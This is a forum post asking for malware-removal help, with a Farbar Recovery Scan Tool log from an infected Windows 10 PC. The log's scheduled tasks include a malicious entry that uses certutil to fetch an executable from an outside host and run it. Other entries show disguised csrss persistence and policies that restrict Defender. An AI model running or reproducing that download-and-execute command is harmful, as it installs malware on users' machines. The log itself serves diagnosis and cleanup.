Cloudnet infection

clodnet browser new wind

#1
spra

After a suspicious download, Windows Defender found some threats. I let it clean them and rebooted. Upon rebooting, Defender found them again and I removed them again. The next time it did not ask to remove anything and showed the removed threats. I attempted to run Malwarebytes, but each time I try I get a message saying "Windows cannot access the specified device, path or file. You may have not access...", which is also a new thing, obviously caused by the infection. The next (new) problem is that in my installed programs list I see one called Cloudnet, which was installed today unintentionally. When I click to uninstall it, a DOS window appears with some Russian(?) characters which I cannot understand. If I press Enter the window goes away, but the program remains installed. The other symptom is that whatever is installed, it opens Firefox windows every few minutes. I am not sure that I have understood your instructions about attaching files. Is it attaching these 2 files or copy-pasting the texts here? So I think I will do both. This is partly because the connection is not so good right now and I am having a hard time communicating with you properly. For example, the first times I tried to write this text, there was no text box to write onto. It appeared just some minutes ago after a few attempts to reload the page, and finally I can write this to you. Thank you in advance for any help.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 24-11-2019
Ran by SR (administrator) on DESKTOP-A0OS1Q6 (Gigabyte Technology Co., Ltd. To be filled by O.E.M.) (24-11-2019 19:50:32)
Running from D:\Users\SR\Downloads
Loaded Profiles: SR (Available Profiles: SR & Administrator)
Platform: Windows 10 Pro Version 1803 17134.345 (X64) Language: English (United States)
Default browser: FF
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

( ) [File not signed] C:\Users\SR\AppData\Local\Temp\is-2HG9K.tmp\Guitar.exe
() [File not signed] C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe
() [File not signed] C:\Users\SR\AppData\Local\Temp\is-FML3U.tmp\Guitar.tmp
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Brio) [File not signed] C:\Program Files\FolderSize\FolderSizeSvc.exe
(Creative Labs Inc -> Creative Technology Ltd) C:\Windows\SysWOW64\CtHelper.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(IDRIX -> IDRIX) C:\Program Files\VeraCrypt\VeraCrypt.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieCtrl.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieSvc.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieSvc.exe
(Logitech Inc -> Logitech) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOverlay.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\LogiOptions\LogiOptions.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOptionsMgr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\NisSrv.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Open Source Developer, Phillip Gibbons -> Highresolution Enterprises) C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(PACE Anti-Piracy, Inc. -> PACE Anti-Piracy, Inc.) C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe
(Polenter - Pawel Idzikowski -> Polenter - Software Solutions) C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe
(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(WinAbility Software Corporation -> WinAbility® Software Corporation) C:\Program Files\IconShepherd\ISEXE64.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [XMouseButtonControl] => C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe [1605856 2019-08-18] (Open Source Developer, Phillip Gibbons -> Highresolution Enterprises)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3933496 2012-09-20] (Logitech -> Logitech, Inc.)
HKLM\...\Run: [AsioReg] => REGSVR32.EXE /S CTASIO.DLL*
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [2176648 2018-06-18] (Logitech Inc -> Logitech, Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3136136 2019-01-30] (Logitech Inc -> Logitech, Inc.)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [6260544 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
HKLM-x32\...\Run: [AsioThk32Reg] => REGSVR32.EXE /S CTASIO.DLL
HKLM-x32\...\Run: [CTHelper] => C:\Windows\SysWOW64\CTHELPER.EXE* [23040 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [CTxfiHlp] => C:\Windows\SysWOW64\CTXFIHLP.EXE* [23552 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645648 2019-10-05] (Oracle America, Inc. -> Oracle Corporation)
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\ DisallowedCertificates: 7D4EAFF45C5D8A3E9AB24486D12F4B4F7F4DBB60 (U)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3199776 2018-04-03] (Valve -> Valve Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [DesktopReminder2ByPolenter] => C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe [3164048 2017-06-21] (Polenter - Pawel Idzikowski -> Polenter - Software Solutions)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [SandboxieControl] => C:\Program Files\Sandboxie\SbieCtrl.exe [3682968 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Viber] => C:\Users\SR\AppData\Local\Viber\Viber.exe [38564936 2019-10-30] (Viber Media S.à r.l. -> Viber Media S.à r.l.)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [GreenResonance] => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [7890540] => C:\Users\SR\AppData\Local\Temp\is-2HG9K.tmp\Guitar.exe [877745 2019-11-24] ( ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [CloudNet] => C:\Users\SR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-11-24] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKLM\Software\...\Authentication\Credential Providers: [{AA96996E-48DD-4D31-A94D-8563298A8C2D}] -> C:\WINDOWS\system32\WACP.dll [2016-09-20] (Softomotive Ltd -> )
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Icon Shepherd.lnk [2019-10-31]
ShortcutTarget: Icon Shepherd.lnk -> C:\Program Files\IconShepherd\ISEXE64.exe (WinAbility Software Corporation -> WinAbility® Software Corporation)
GroupPolicy: Restriction - Firefox <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0E55825A-221F-4E7A-9416-6D13AA06ABD8} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {12152F8B-CD2F-42DE-A539-041A8A936465} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {14324AB2-DEA1-4205-8D09-E4BC117610AE} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {15D1F9B6-04A3-4972-A83C-EF0F4BBB8427} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {1B9C5A1B-9321-46BB-84C5-DF45191FF376} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [648504 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {2208EA4A-30D8-45CC-8BDD-7FC3B05195B5} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {42596E64-0421-415A-9C21-4EC99F971F53} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {42CF4929-54EE-42D2-B729-F538516C85C2} - System32\Tasks\JumpingBytes\PureSyncVSS => C:\Program Files (x86)\Jumping Bytes\PureSync\PureSyncVSSStart.exe [35656 2016-06-16] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
Task: {66B093E3-0989-45FD-B21D-EE39713B7201} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe
Task: {78A0CAD1-8991-4E6C-966D-4E69097977E8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7F8AE7BB-B4DE-4B22-9729-1E5E19704D1A} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {881D3DFF-B43A-44C2-820D-F54679FAE900} - System32\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE [690536 2013-11-22] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Task: {93894B49-495F-4FF7-A834-F07A572C2C25} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {950BA929-9185-474B-B254-40BA3B8E3A1B} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {962642C0-4430-4032-92EE-908F3A5F3E52} - System32\Tasks\ExclusiveTool => C:\Program Files (x86)\DSDCS\InputMapper\ExclusiveModeTool.exe [19968 2016-10-04] (InputMapper) [File not signed]
Task: {99C2988F-4978-44CF-9C99-C8698A7E4DD0} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {9FAB49BF-9A8A-43A8-A5BF-493EE72EF726} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616320 2018-01-08] (Apple Inc. -> Apple Inc.)
Task: {A197B1E1-5017-44E1-8786-700A5A077A97} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {A2CB4A3E-AFDC-43FA-98BA-0A92F7E5DABE} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {A809944B-8D1B-4F63-BB06-E2CD920F61A2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {AD74C57C-54F0-4805-B7A0-CB5A9FA03223} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {B264C95D-A9B6-4D69-9B94-FB67D6DB757E} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {B69A753B-777A-4C1E-AA9D-1033C77839DE} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\explorer.exe /NOUACCHECK
Task: {B6C27676-7B71-492F-BB86-892E15752F97} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION
Task: {C68E190A-5D0C-40B1-895A-9522150D9369} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C789D50A-A2A0-405F-B279-A59DBA0D126E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://tfortytimes.com/app/app.exe C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {CCC37DAD-9377-4ED5-80DB-F21C8D60E2E6} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {D34CA7D5-150E-4A42-9C1F-D72B477043A6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {DC559262-3918-4E5A-B027-44ED71265B49} - System32\Tasks\JumpingBytes\PureSyncExit => C:\Program Files (x86)\Jumping Bytes\PureSync\PureSyncAdmin.exe [105808 2018-11-12] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
Task: {E02831A3-E4D2-410D-9AAC-0268EE1483DF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F1C3AFE7-5B89-4B71-8D62-12804C3764B1} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F7413A74-A9B1-4E6A-91D4-0570477CA0ED} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3787304 2019-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F9DCD18B-6730-49E0-8339-A8013E910822} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {FEF2A145-6CB7-48B3-827C-4FFCF30E20F1} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE:/EXE:{3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} /F:UpdateWORKGROUP\DESKTOP-A0OS1Q6$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-3967059023-4107875624-2872843465-1001] => http=127.0.0.1:8888;
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 1.1.1.1 1.0.0.1
Tcpip\..\Interfaces\{2a8e95f9-250a-4cdc-8d08-f661e3f2a913}: [DhcpNameServer] 1.1.1.1 1.0.0.1

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope value is missing
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_231\bin\ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_231\bin\jp2ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF DefaultProfile: qyonbq05.default-1454591260015
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release [2019-11-24]
FF Notifications: Mozilla\Firefox\Profiles\dho1fb01.default-release -> hxxps://mail-notification.info
FF Extension: (DuckDuckGo Privacy Essentials) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\[email protected] [2019-10-27]
FF Extension: (Skip Redirect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\[email protected] [2019-11-15]
FF Extension: (Adblocker Lite) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\{3596f810-bf50-47e2-b54a-2128ebdc5179}.xpi [2019-06-05]
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 [2019-11-24]
FF DownloadDir: D:\Users\SR\Downloads
FF NewTab: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> about:newtab
FF NetworkProxy: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> type", 0
FF Notifications: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> hxxps://mail-notification.info
FF Extension: (Disconnect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-04-15]
FF Extension: (Grammarly for Firefox) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-02-04]
FF Extension: (AdGuard AdBlocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-04-17]
FF Extension: (Block Site) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{54e2eb33-18eb-46ad-a4e4-1329c29f6e17}.xpi [2019-05-01]
FF Extension: (Adblock Plus - free ad blocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2019-04-20]
FF Extension: (No Name) - C:\Program Files\Mozilla Firefox\browser\features\{EBA45A79-A229-44D3-A606-3DADEAC6A066}.xpi [2019-08-11] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2019-10-19] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
FF Plugin: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd -> )
FF Plugin: @java.com/DTPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\dtplugin\npDeployJava1.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\plugin2\npjp2.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
